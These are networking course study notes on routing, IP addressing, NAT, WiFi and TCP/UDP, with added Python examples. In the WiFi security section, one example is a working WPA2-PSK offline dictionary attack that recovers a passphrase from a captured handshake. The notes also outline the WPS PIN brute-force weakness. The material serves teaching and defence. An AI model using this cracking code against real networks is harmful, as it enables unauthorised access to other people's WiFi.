- Router’s job to handle messages to other networks
- Hops
- Packet may pass through many routers on its journey
- Each router is a hop
- Routing Table
- Each router has its own routing table that has the known networks
- Router looks at the IP address of a packet then decides which network address it is on
- If it knows the address it sends it
- If it has no matching route it sends the packet via its default route (gateway of last resort)
- If it doesn’t have a default gateway then it doesn’t send the packet merely drops it
- Directly connected sources show up as C
- Statically configured is shown as S
- Default configured by admin is S*
- Learned from another router using RIP is R
- Routing Process
- De-encapsulates the frame
- Extracts destination IP from the packet
- Performs look up of routing table
- Static Routes versus Dynamic Routes
- Entered by the administrator | Learned from other routers
- Time consuming, different for each router | Start the routing protocol (e.g. RIP) and it runs by itself
- Must be updated by hand if routes change | Automatically updates itself
- Little processing | More processing
- No bandwidth is used | Uses bandwidth for routing updates
- Gives nothing away | Gives away information about the network in its updates
- IPv6
- IPv4 issues
- Depletion
- Lack of end to end connectivity
- Internet routing table expansion
- Fix
- Increased address space
- Improved packet handling
- Eliminates the need for NAT
- Integrated security
- IPv6 Packet
- Version | Traffic Class | Flow Label
- Payload Length | Next Header | Hop Limit
- Source IP Address (128 bits)
- Destination IP Address (128 bits)
- IPv6 Improvements
- Improvements over IPv4 header
- Better routing efficiency and performance
- No requirements for processing checksums
- Simplified
- Flow label field allows per-flow handling, so routers can forward all packets of one flow the same way without inspecting each one
- IPv6 Fields
- Header Fields
- Version
- IPv6 (0110)
- Traffic Class
- It is used for congestion control. Essentially priority
- Flow Label
- Real time applications to send router information to forward as is without storing
- Payload Length
- How big the packet is
- Next Header
- Identifies the header or protocol that follows (e.g. TCP, UDP, ICMPv6 or an extension header)
- Public Address
- IPv4 reserves a few blocks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) for private use; every other address is public and usable on the internet
- Packets with a private source or destination IP are not forwarded across the internet; NAT translates them to a public address at the edge
- Lab 7
- A subnet mask of /24 is the same as a subnet mask of 255.255.255.0, which is the same as 11111111.11111111.11111111.00000000 (24 network bits, 8 host bits)
- IPv4 Addressing Conversion
- 32 bit IPv4 binary to dotted decimal
- 0.0.0.0
- Three different types of addresses
- Network Address
- Address that is the network statement
- All addresses within the same network share this address
- Host Addresses
- All addresses assigned to the host in the network
- Broadcast address
- Sends to all hosts within the network
- Calculations
- Network address
- All host bits are 0s
- Broadcast
- All host bits are 1s
- Host address
- Network +1 to broadcast -1
- Number of hosts in a network = 2^(32 - n) - 2, where n is the prefix length (subtract the network and broadcast addresses)
- Perform calculations for 192.168.15.100/24
- Network address (all host bits are 0)
- 192.168.15.0
- Broadcast address (all host bits are 1s)
- 192.168.15.255
- Host range
- 192.168.15.1 to 192.168.15.254
- Perform calculations for 172.16.10.254/16
- Network address (all 16 host bits 0): 172.16.0.0
- Broadcast address (all host bits 1): 172.16.255.255
- Host range: network + 1 to broadcast - 1 = 172.16.0.1 to 172.16.255.254
- Number of hosts: 2^(32 - 16) - 2 = 65536 - 2 = 65534
- 192.168.1.100/25 to binary
- 11000000.10101000.00000001.01100100
- The /25 mask leaves 7 host bits; the first bit of the last octet (value 128) is a network bit
- For .100 that bit is 0, so the network address is 192.168.1.0, the host range is 192.168.1.1 to 192.168.1.126 and the broadcast is 192.168.1.127
- The other /25 in this block starts where the last octet becomes 10000000: network 192.168.1.128, host range 192.168.1.129 to 192.168.1.254, broadcast 192.168.1.255
- Basic Subnetting
- Allows creating multiple networks from a single address block to maximize address efficiency
- Borrowing b bits gives 2^b subnets
- Subnet masks
- Mask | Usable hosts | Host bits
- 255.255.255.0 (/24) | 254 hosts | 8
- 255.255.255.128 (/25) | 126 hosts | 7
- 255.255.255.192 (/26) | 62 hosts | 6
- 255.255.255.224 (/27) | 30 hosts | 5
- 255.255.255.240 (/28) | 14 hosts | 4
- 255.255.255.248 (/29) | 6 hosts | 3
- 255.255.255.252 (/30) | 2 hosts | 2
- Network address will always be an even number
- First host is always an odd number
- Last usable address always an even number
- The smallest subnet with usable hosts is /30 (2 hosts); /31 is only used on point-to-point links and /32 is a single host
- To find the next subnet quickly, add the block size (the value of the last network bit) to the current network address
- For a /26 the block size is 64, so the subnets are 0, 64, 128 and 192 and their broadcast addresses are 63, 127, 191 and 255
- A /27 has a block size of 32 and gives 8 subnets (0, 32, 64, 96, 128, 160, 192, 224)
- 192.168.0.64/27 (11000000.10101000.00000000.010 00000)
- First usable is .65 (11000000.10101000.00000000.010 00001)
- Last usable is .94 (11000000.10101000.00000000.010 11110)
- Broadcast is .95 (11000000.10101000.00000000.010 11111)
- Prefix | /24 | /25 | /26 | /27 | /28 | /29 | /30 | /31 | /32
- Block size | 256 | 128 | 64 | 32 | 16 | 8 | 4 | 2 | 1
- Last mask octet | .0 | .128 | .192 | .224 | .240 | .248 | .252 | .254 | .255
- Subnets of a /24 | 1 | 2 | 4 | 8 | 16 | 32 | 64 | 128 | 256
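The subnet arithmetic from Lab 7, as an added example that is not part of the lab notes: the network, broadcast, host range and host count worked with plain integer and bit operations, the way it is done by hand above, plus the "add the block size" rule for listing subnets. The standard library ipaddress module is used only to cross-check the hand method. The addresses are the ones worked in the notes.

```python
# Added example (not part of the lab notes): subnet calculations done with bit
# operations, cross-checked against the ipaddress module.
import ipaddress

def ip_to_int(ip: str) -> int:
    a, b, c, d = (int(o) for o in ip.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d

def int_to_ip(n: int) -> str:
    return "%d.%d.%d.%d" % ((n >> 24) & 255, (n >> 16) & 255, (n >> 8) & 255, n & 255)

def to_binary(ip: str) -> str:
    """Dotted binary, the form used in the lab to spot the network/host boundary."""
    return ".".join(format(int(o), "08b") for o in ip.split("."))

def mask_from_prefix(prefix: int) -> int:
    """n ones from the left, then zeros (a mask is always contiguous, left to right)."""
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF

def subnet_info(cidr: str) -> dict:
    ip, prefix = cidr.split("/")
    prefix = int(prefix)
    mask = mask_from_prefix(prefix)
    net = ip_to_int(ip) & mask                  # network address: all host bits 0
    bcast = net | (~mask & 0xFFFFFFFF)          # broadcast address: all host bits 1
    host_bits = 32 - prefix
    # /31 and /32 have no network/broadcast pair, so the "-2" rule does not apply
    usable = 2 ** host_bits - 2 if host_bits >= 2 else 0
    return {
        "network": int_to_ip(net), "mask": int_to_ip(mask), "broadcast": int_to_ip(bcast),
        "first_host": int_to_ip(net + 1) if usable else None,
        "last_host": int_to_ip(bcast - 1) if usable else None,
        "usable_hosts": usable,
        "block_size": 2 ** host_bits,
    }

def subnets_of(cidr: str, new_prefix: int) -> list:
    """Split cidr into 2^b subnets (b = borrowed bits); returns each subnet's network address."""
    old_prefix = int(cidr.split("/")[1])
    borrowed = new_prefix - old_prefix
    step = 2 ** (32 - new_prefix)               # "add the value of the next bit" rule
    start = ip_to_int(subnet_info(cidr)["network"])
    return [int_to_ip(start + i * step) for i in range(2 ** borrowed)]

def cross_check(cidr: str) -> bool:
    """The hand method must agree with the standard library."""
    mine = subnet_info(cidr)
    ref = ipaddress.ip_network(cidr, strict=False)
    return (mine["network"] == str(ref.network_address)
            and mine["broadcast"] == str(ref.broadcast_address)
            and mine["mask"] == str(ref.netmask))

if __name__ == "__main__":
    for cidr in ("192.168.15.100/24", "172.16.10.254/16", "192.168.1.100/25", "192.168.0.64/27"):
        print(cidr, subnet_info(cidr), "agrees with ipaddress:", cross_check(cidr))
    print(subnets_of("192.168.0.0/24", 27))
```

Note the strict=False in cross_check: ipaddress refuses "192.168.15.100/24" otherwise, because the host bits are set, which is exactly the case the lab asks you to reduce to the network address by hand.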
- Special addresses
- Network and broadcast
- First and last address of any network
- Default route
- 0.0.0.0/0, all zeros. It is a catch-all
- Loop back
- 127.0.0.0/8 (127.0.0.1 is the usual address)
- Talks to yourself
- Testing
- Link Local
- 169.254.0.0/16
- Test-NET
- 192.0.2.0/24
- Teaching and learning
- IPv4 Addressing
- Classful Legacy
- Class A, B, C, D
- CIDR/Classless
- Method of allocating addresses via subnetting
- NAT (Network Address Translation)
- Allows hosts on private network to “borrow” public address for communicating with outside networks
- NAT translate source IP/source port in layer 3 and 4 PDU and maps it in its table
- Communication Types
- Unicast
- One to one
- HTTP, HTTPS
- Broadcast
- One to all of same network
- ARP
- Directed
- To network broadcast address
- Multicast
- One to a group of hosts, which may span networks
- SSDP, IPTV
- Tracert
- Traceroute is a computer network diagnostics tool for displaying route path and measuring delays
- IPv4 and IPv6 Coexistance
- Dual-Stack
- Tunnelling
- Translation
- IPv6 Address Anatomy
- 128 bit
- Written in hextets xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
- IPv6 Prefix Length
- Used to indicate network portion
- IPv6 Representation
- Rule1: omit all leading 0s
- Rule2: Omit all zero segments (::)
- IPv6 Address Types
- Unicast
- Uniquely identifies an interface of an IPv6 address
- Global Unicast
- Similar to IPv4 public
- Global unicast are 001 or 2000::/3
- 2001:0DB8::/32 is for documentation only
- Link Local
- Used to communicate with other devices on same link
- Link == subnet == network segment
- Fe80::/10 is for link-local only
- Loopback
- Used by host to send packet to itself
- ::1/128
- Unspecified Address
- ::/128
- Cannot be assigned
- Used only as source address when it doesn’t matter to the destination
- Unique Local
- Similar to IPv4 private
- FC00::/7 (FC00:: to FDFF::); in practice FD00::/8 is used
- IPv4 Embedded
- Help transition from IPv4 to IPv6
- Multicast
- Used to send a single packet to multiple destinations
- Only seen as destination address
- FF00::/8
- Assigned Multicast
- Reserved for predefined group of devices
- FF02::1 all-node multicast group
- All IPv6 enabled devices join this group
- FF02::2 all-routers multicast group
- Solicited node multicast
- FF02::1:FF00:0/104, with the last 24 bits copied from the unicast address
- Anycast
- Any unicast address that can be assigned to multiple devices
- Stateless (SLAAC): the host builds its own interface ID, from the MAC with EUI-64 or randomly, using the prefix advertised by the router
- Stateful DHCPv6: the address (interface ID) is assigned by the DHCPv6 server
- % special identifier and is known as a zone index
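The IPv6 representation rules and address types above, as an added example that is not part of the notes: Python code that expands and compresses addresses (rule 1: drop leading zeros, rule 2: replace the longest run of zero hextets with ::), classifies an address by its prefix, builds the EUI-64 interface ID a SLAAC host derives from its MAC, and computes the solicited-node multicast group for a unicast address. The ipaddress module is used only to cross-check the compressed form; the addresses and MAC are constructed samples.

```python
# Added example (not part of the notes): IPv6 expansion/compression, prefix
# classification, EUI-64 and solicited-node multicast. Sample addresses are constructed.
import ipaddress

def expand(addr: str) -> list:
    """Return the 8 hextets as ints, undoing '::' and dropped leading zeros."""
    if addr.count("::") > 1:
        raise ValueError("only one '::' allowed")
    head, _, tail = addr.partition("::")
    left = [int(h, 16) for h in head.split(":") if h]
    right = [int(h, 16) for h in tail.split(":") if h]
    missing = 8 - len(left) - len(right)
    if missing < 0 or ("::" not in addr and missing != 0):
        raise ValueError("wrong number of hextets in %s" % addr)
    return left + [0] * missing + right

def compress(hextets: list) -> str:
    """Rule 1: omit leading zeros. Rule 2: replace the longest run (>= 2) of zero hextets with '::'."""
    best_start, best_len, run_start = -1, 0, None
    for i, h in enumerate(hextets + [1]):      # sentinel closes a trailing run
        if h == 0 and run_start is None:
            run_start = i
        elif h != 0 and run_start is not None:
            if i - run_start > best_len:        # first longest run wins, as RFC 5952 requires
                best_start, best_len = run_start, i - run_start
            run_start = None
    parts = ["%x" % h for h in hextets]
    if best_len >= 2:
        return ":".join(parts[:best_start]) + "::" + ":".join(parts[best_start + best_len:])
    return ":".join(parts)

def classify(addr: str) -> str:
    h = expand(addr)
    if h == [0] * 8:
        return "unspecified"                     # ::/128
    if h == [0] * 7 + [1]:
        return "loopback"                        # ::1/128
    first = h[0]
    if first >> 8 == 0xFF:
        return "multicast"                       # FF00::/8
    if first & 0xFFC0 == 0xFE80:
        return "link-local"                      # FE80::/10
    if first & 0xFE00 == 0xFC00:
        return "unique-local"                    # FC00::/7
    if first >> 13 == 0b001:
        return "global-unicast"                  # 2000::/3 (first three bits 001)
    return "other"

def eui64_interface_id(mac: str) -> list:
    """EUI-64: split the 48-bit MAC, insert FFFE in the middle, flip the U/L bit of byte 0."""
    b = bytearray(bytes.fromhex(mac.replace(":", "")))
    b[0] ^= 0x02
    iid = bytes(b[:3]) + b"\xff\xfe" + bytes(b[3:])
    return [int.from_bytes(iid[i:i + 2], "big") for i in range(0, 8, 2)]

def link_local_from_mac(mac: str) -> str:
    return compress([0xFE80, 0, 0, 0] + eui64_interface_id(mac))

def solicited_node(addr: str) -> str:
    """FF02::1:FFxx:xxxx, where xx:xxxx are the low 24 bits of the unicast address."""
    h = expand(addr)
    low24 = ((h[6] & 0xFF) << 16) | h[7]
    return compress([0xFF02, 0, 0, 0, 0, 1, 0xFF00 | (low24 >> 16), low24 & 0xFFFF])

def cross_check(addr: str) -> bool:
    """Agree with the standard library's canonical (RFC 5952) form."""
    return compress(expand(addr)) == ipaddress.ip_address(addr).compressed

if __name__ == "__main__":
    for a in ("2001:0db8:0000:0000:0000:0000:0000:0001", "fe80::1", "fd12::1", "ff02::1", "::1", "::"):
        print(a, "->", compress(expand(a)), classify(a))
    print(link_local_from_mac("00:1c:b3:01:02:03"), solicited_node("2001:db8::1"))
```

The EUI-64 step is why a MAC-derived address is easy to recognise: the ff:fe in the middle of the interface ID and the flipped U/L bit give away the burned-in MAC, which is the reason hosts now default to random interface IDs.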
- Broadcast Domain
- Broadcast MAC FF:FF:FF:FF:FF:FF
- Router is the endpoint of the broadcast domain
- Router divides networks into broadcast domains
- Example: college (AC) intranet to the internet
- The private network uses your private IP; the internet only sees the router's public IP; NAT translates between them
- A (inside host) sends with SRC 10.70.172.22 port 1026 and DST 79.125.225.143 port 80
- After NAT the internet sees SRC 205.211.150.161 port 1026 and DST 79.125.225.143 port 80
- The router records 10.70.172.22:1026 <-> 205.211.150.161:1026 so the reply from port 80 can be sent back to A
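The NAT behaviour described in Week 2 and in the example above, as an added example that is not part of the notes: a port-overload NAT (PAT) model in Python. The inside socket 10.70.172.22:1026 is mapped to the public address 205.211.150.161, the web server at 79.125.225.143:80 only ever sees the public socket, a second inside host that happens to use the same source port gets a different public port, and an inbound packet with no matching table entry is dropped. The IP addresses are the ones in the notes; port numbers are constructed.

```python
# Added example (not part of the notes): port-overload NAT (PAT) with a translation
# table. Addresses come from the notes' example; port numbers are constructed.

class PortNat:
    def __init__(self, public_ip, first_port=1024):
        self.public_ip = public_ip
        self.next_port = first_port
        self.out_table = {}   # (inside_ip, inside_port, dst_ip, dst_port) -> public_port
        self.in_table = {}    # (public_port, dst_ip, dst_port) -> (inside_ip, inside_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Translate a packet leaving the private network; returns the rewritten 4-tuple."""
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.out_table:
            # keep the inside port when it is free (so the table reads like the notes' example),
            # otherwise allocate a fresh public port: this is the "overload" in PAT
            if (src_port, dst_ip, dst_port) not in self.in_table:
                pub_port = src_port
            else:
                pub_port = self._alloc()
            self.out_table[key] = pub_port
            self.in_table[(pub_port, dst_ip, dst_port)] = (src_ip, src_port)
        return (self.public_ip, self.out_table[key], dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_ip, dst_port):
        """Translate a packet arriving from the internet; None means no mapping, drop it."""
        if dst_ip != self.public_ip:
            return None
        inside = self.in_table.get((dst_port, src_ip, src_port))
        if inside is None:
            return None   # unsolicited: no inside host asked for this, private sockets stay hidden
        return (src_ip, src_port, inside[0], inside[1])

    def _alloc(self):
        while any(k[0] == self.next_port for k in self.in_table):
            self.next_port += 1
        port = self.next_port
        self.next_port += 1
        return port

if __name__ == "__main__":
    nat = PortNat("205.211.150.161")
    print(nat.outbound("10.70.172.22", 1026, "79.125.225.143", 80))
    print(nat.inbound("79.125.225.143", 80, "205.211.150.161", 1026))
    print(nat.inbound("198.51.100.9", 443, "205.211.150.161", 1026))   # None: dropped
```

The inbound lookup keys on the remote address and port as well as the public port, so a reply is only let through from the server the inside host actually contacted; that is the side effect that makes a home NAT behave like a basic stateful firewall.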
- Week 9
- 802.11
- More commonly known as WiFi
- Operates at the Physical layer and the MAC sublayer of the Data Link layer
- CSMA/CA
- Operates like a hub
- Shares the same features as a hub
- All nodes connected to access point in same collision domain
- Frame Control Field
- Protocol Version | Type | Subtype | To DS | From DS | More Fragments | Retry | Power Management | More Data | WEP (Protected Frame) | Order
- BSS Identfier (BSSID)
- Uniquely identifies the BSS (normally the MAC address of the AP's radio); carried in every beacon
- Destination Address
- Indicates the MAC address of the final destination to receive the frame
- Source Address
- Indicates the mac address of the original source that created and transmitted the frame
- Receiver Address
- Indicates the MAC address of the next immediate station (STA) on wireless medium to receive frame
- Transmitter Address
- Indicates MAC address of the station that transmitted the frame onto the wireless medium
- Two forms of WiFi
- Ad-hoc mode
- Client to client (peer to peer)
- No central Wireless Access point
- Know as independent Basic Service Set (IBSS)
- Infrastructure mode
- Consist of at least one wireless client (station) and one wireless access point (AP)
- The AP is a bridge to the wired LAN or other wireless STA
- Extended Service Set (ESS)
- Enterprise level (like Algonquin)
- Set of two or more wireless access points connected to the same wired network that shares the same logical network segment and SSID
- Basic Service Set (BSS)
- Single AP
- Small office home office
- Terminology
- SSID
- Service set identifier is the name of the network
- It is the name advertised in the Beacon so clients know the network exists
- Beacon
- Transmitted by an AP ten times per second
- Advertises existence of AP on particular channel(s)
- Access Point (AP)
- Layer 2 device that acts as the bridge between wireless clients and the wired network
- Bridge
- Network layer 2 device that interconnects two dissimilar network types together using the LLC sublayer
- Station (STA)
- Is a device that has the capability to use 802.11 protocol
- Could be a laptop, desktop, etc
- Distribution System (DS)
- Wireless distribution system, which enables the wireless interconnection of access points
- Allows networks to expand without wired backbone
- Collision Avoidance
- A wireless device cannot hear a collision while it is transmitting, so it avoids them instead: it listens first and can signal its readiness to transmit with a request-to-send (RTS)
- The AP (central controller) answers with a clear-to-send (CTS), which reserves the air for that station
- When cleared it sends the frame
- Every data frame must be acknowledged by the receiver
- If no acknowledgement arrives the station assumes a collision, waits a random back-off time and retransmits
- Standards
- 802.11a
- 5GHz max of 54Mb/s
- Smaller coverage area but less interference
- 802.11b
- 2.4GHz max of 11Mb/s
- Longer range but more interference
- 802.11g
- 2.4GHz max of 54Mb/s
- Longer range but more interference
- Operates of frequency range of b but with bandwidth of a
- 802.11n
- 2.4GHz or 5GHz, max of 100Mb/s to 600Mb/s depending on channel width and number of MIMO spatial streams
- Backwards compatible with a, b, g
- 802.11ac
- 5GHz only, max of 450Mb/s to 1.3Gb/s (first wave); a dual-band 802.11ac AP serves 2.4GHz clients with 802.11n
- Backwards compatible with a, b, g, n
- 802.11ad
- 60GHz, max of about 7Gb/s; tri-band devices also keep 2.4GHz and 5GHz radios because 60GHz signals do not pass through walls
- 2.4GHz
- Most used frequency
- Divided into 11 overlapping channels (North America; 13 in most of Europe), of which at most 3 do not overlap
- 1, 6, 11
- 5GHz
- Up to 23 non-overlapping 20MHz channels, depending on the regulatory domain
- One 20MHz channel carries the 54Mb/s of 802.11a; the higher 802.11n/ac rates bond several adjacent channels into 40MHz, 80MHz or 160MHz channels
- Dual-Band AP
- Operate in both 2.4GHz and 5GHz band
- Mixed Mode AP
- Supports different 802.11 versions
- Throughput degrades, because the AP must fall back to protection mechanisms and legacy rates so that older clients can coexist with newer ones
- Basic Setup/Security
- Authentication
- PSK
- Pre-shared key (WPA/WPA2-Personal): every station uses the same passphrase
- Vulnerable to offline password cracking: the key is derived only from the passphrase and SSID, so an attacker who captures the 4-way handshake can test guesses without ever talking to the AP
- EAP
- 802.1X/EAP (WPA/WPA2-Enterprise): each user authenticates individually against a RADIUS authentication server, and every station ends up with its own session key
- Encryption
- WEP
- Wired Equivalent Privacy
- Broken: RC4 with a 24-bit IV, so keys can be recovered from captured traffic in minutes; never use it
- WPA
- WiFi Protected Access
- Interim replacement for WEP that uses TKIP (still RC4-based); also deprecated
- WPA2
- WiFi Protected Access II
- Replaced WPA
- Uses AES in CCMP mode, an encryption approved for US Department of Defense use
- Basic security
- Change router’s password
- Change SSID
- Turn on security: WPA2-PSK with AES (CCMP), not TKIP
- MAC filtering (weak on its own: MAC addresses are sent in the clear and are trivially spoofed)
- WiFi Protected Setup
- WPS lets users join a device to the home network without opening the router's configuration screens or knowing the passphrase (push button or 8-digit PIN)
- The PIN method is a known weakness: the PIN is verified in two halves, so it can be brute-forced in a few thousand attempts, after which the router hands over the WPA2 passphrase; disable WPS wherever the AP allows it
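The "vulnerable to password cracking" point about PSK is easiest to see in code. The following is an added example, not part of these notes: it implements the public WPA2-PSK key derivation (PBKDF2 from passphrase and SSID to the PMK, the 802.11i PRF to the PTK, HMAC-SHA1 MIC over an EAPOL-Key frame) and runs an offline dictionary attack against a captured handshake. The SSID, MAC addresses, nonces, wordlist and "captured" message 2 are all constructed here rather than sniffed, and the EAPOL frame contains only the fields the MIC covers.

```python
import hashlib
import hmac

# Constructed demo values (not from a real capture): the attacker has sniffed
# the AP MAC, station MAC, ANonce, SNonce and message 2 of the 4-way handshake.
SSID = "CollegeGuest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "algonquin1", "correct horse", "qwerty123"]

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
# + replay counter (8) + nonce (32) + IV (16) + RSC (8) + ID (8) = 81
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    It depends only on the passphrase and SSID, so anyone can compute it for any guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: expands the PMK with both MACs and both nonces into the PTK.
    Its first 16 bytes are the KCK, the key that authenticates the handshake messages."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def build_eapol_key(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key frame for message 2 (station -> AP), key data length 0."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (CCMP) handshake MIC: HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str) -> bytes:
    """Stand-in for sniffing: the message 2 a station using `passphrase` would send."""
    kck = wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_key(SNONCE, eapol_mic(kck, build_eapol_key(SNONCE)))


def crack_psk(captured_msg2: bytes, wordlist):
    """Offline dictionary attack: recompute the MIC for each guess and compare it
    with the one in the capture. Nothing is sent to the AP."""
    observed_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = wpa2_ptk(wpa2_pmk(guess, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if eapol_mic(kck, captured_msg2) == observed_mic:
            return guess
    return None


if __name__ == "__main__":
    msg2 = capture_handshake("correct horse")
    print("recovered passphrase:", crack_psk(msg2, WORDLIST))
```

Because the attack is entirely offline, rate limiting on the AP does not help; the only defences are a passphrase that is not in any wordlist, or WPA2-Enterprise, where each station negotiates its own key.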
- Week 10
- Layer 4 Transport Layer (segment)
- Defines three general functions
- Segmentation
- Breaking conversations into small pieces
- Reassembly at receiving end
- Multiplexing
- Interleaving the small pieces into shared network
- Identification of segment to be reassembled in correct order
- Error checking
- Makes sure that data integrity has been kept
- Some functions the layer 4 transport layer helps facilitate
- Email
- Messaging
- Web surfing
- Download
- Layer 4 protocols provide
- Connection-oriented conversations
- Reliable delivery
- Ordered data reconstruction
- Flow control
- Two most common layer 4 protocols
- UDP (unreliable), 8-byte header
- User Datagram Protocol
- Connectionless
- Best effort
- Low overhead
- Only implements the basic functions (ports, length, checksum)
- TCP (reliable), 20-byte header (minimum; options make it longer)
- Transmission Control Protocol
- Connection oriented
- Acknowledged delivery with retransmission of lost segments
- High overhead
- Implements the advanced functions
- Application Port Numbers
- Protocol | Purpose | Port | TCP/UDP
- HTTP | Web browsing | 80 | TCP
- HTTPS | Secure web browsing (HTTP over TLS) | 443 | TCP
- DNS | Name resolution, e.g. translating www.google.com to its IP address | 53 | both (UDP for most queries, TCP for zone transfers and large answers)
- SMTP | Sending email | 25 | TCP
- POP3 | Receiving email | 110 | TCP
- Telnet | Unencrypted remote terminal, the insecure predecessor of SSH (port 22) | 23 | TCP
- FTP | File transfer; uses two ports, one for commands and one for data | 21 (control) / 20 (data) | TCP
- DHCP/DHCPv6 | Configures IP addressing in IPv4 or IPv6 | 67/68 (DHCPv6: 547/546) | UDP
- Source and Destination Port
- The client's source port is an ephemeral port chosen from above the well-known range; the destination port is the server's well-known port for the service
- Well-known ports are 0-1023, registered ports 1024-49151, dynamic/ephemeral ports 49152-65535
- Client to server: | source 4456 | destination 80 | data |
- Server back to client: | source 80 | destination 4456 | data |
- The reply swaps the two ports, which is how the client's stack delivers it to the right socket
- TCP/UDP Headers
- TCP segment
- Source port, destination port
- Sequence number
- Acknowledgment number
- Header length, reserved, code bits (flags: SYN, ACK, FIN, RST, PSH, URG), window size
- Checksum, urgent pointer
- Options, if any
- Application layer data
- UDP
- Source and destination port
- Length, check sum
- Application layer data
- TCP Protocol Overview
- Implements advanced functions to ensure reliable and guaranteed end to end delivery
- Establishing a Session
- Ensures the application is ready to receive the data
- Same order delivery
- Ensures that the segments are reassembled into the proper order
- Reliable delivery
- Means lost segments are resent so the data is received complete
- Flow control
- Manages the delivery rate so that a congested or slow receiving host is not overwhelmed
- Reliability
- TCP connection establishment (SYN)
- TCP segment reassembly
- TCP Acknowledgment and Windowing
- TCP Retransmission
- TCP Congestion control
- Connection teardown (FIN)
- TCP Connection Establishment
- Three-Way Handshake (opens both directions of the connection, each with its own sequence numbers)
- Send SYN
- Send SYN, ACK
- ACK
- Client
- Selects a source port
- Determines initial sequence number
- Determines destination port and IP (socket)
- Sends segment to server (remote host) with “SYN” flag set
- Server (remote host)
- Determines it’s initial sequence number
- Sends segment to “client” with “SYN” and “ACK” flag set
- Client
- Sends segment to Server with ACK flag set
- Segment Reassembly
- TCP Sequence Number
- TCP Segment ACk and Window Size
- TCP Acknowledgment Number
- Window size determines the number of bytes sent before an acknowledgment is expected
- Acknowledgement number is the number of the next expected byte
- TCP Retransmission
- If ACK is not received in time out period then segment is retransmitted
- Role of sender to track ACKs and retransmit unACK segments
- If this keeps happening window size may be smaller
- TCP ACK and Windowing Summary
- Sequence number is assigned to each byte
- Sender waits for positive acknowledgment of receipt
- If ACK is not received in time out period then segment(s) are retransmitted
- Receiver buffers data and passes it in correct order to application
- ACKs are piggybacked on return transmissions
- TCP Connection Tear-down
- Host A sends a segment with FIN (and ACK) set
- Host B acknowledges it with ACK, then sends its own FIN+ACK (the two are often combined into one segment)
- Host A sends the final ACK
- Host B receives the ACK; both directions are now closed
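The header fields, the checksum and the sequence/acknowledgment arithmetic of the handshake above are all concrete enough to build and parse. The following is an added example, not from these notes: it packs and unpacks TCP and UDP headers with struct, computes and verifies the Internet checksum over the IPv4 pseudo-header, and constructs the three handshake segments with the ISN+1 rules described above. The IP addresses, ports and initial sequence numbers are constructed for the example.

```python
import struct
from collections import namedtuple

# Constructed addresses for the pseudo-header (example only, not a capture)
CLIENT_IP, SERVER_IP = "10.70.197.193", "93.184.216.34"

FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
TcpHeader = namedtuple("TcpHeader", "src_port dst_port seq ack data_offset flags window checksum urgent")
UdpHeader = namedtuple("UdpHeader", "src_port dst_port length checksum")


def ones_complement_sum(data: bytes) -> int:
    """Internet checksum: 16-bit one's complement of the one's complement sum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pseudo_header(src_ip: str, dst_ip: str, proto: int, length: int) -> bytes:
    """IPv4 pseudo-header that both TCP (proto 6) and UDP (proto 17) checksum over."""
    return (bytes(int(o) for o in src_ip.split(".")) + bytes(int(o) for o in dst_ip.split("."))
            + struct.pack("!BBH", 0, proto, length))


def build_tcp(src_ip, dst_ip, src_port, dst_port, seq, ack, flags, window=65535, payload=b""):
    """Pack a 20-byte TCP header (no options) with a correct checksum."""
    offset_flags = (5 << 12) | sum(FLAGS[f] for f in flags)    # data offset 5 words = 20 bytes
    hdr = struct.pack("!HHIIHHHH", src_port, dst_port, seq, ack, offset_flags, window, 0, 0)
    csum = ones_complement_sum(pseudo_header(src_ip, dst_ip, 6, len(hdr) + len(payload)) + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def parse_tcp(segment: bytes) -> TcpHeader:
    src, dst, seq, ack, off_flags, win, csum, urg = struct.unpack("!HHIIHHHH", segment[:20])
    return TcpHeader(src, dst, seq, ack, (off_flags >> 12) * 4, off_flags & 0x1FF, win, csum, urg)


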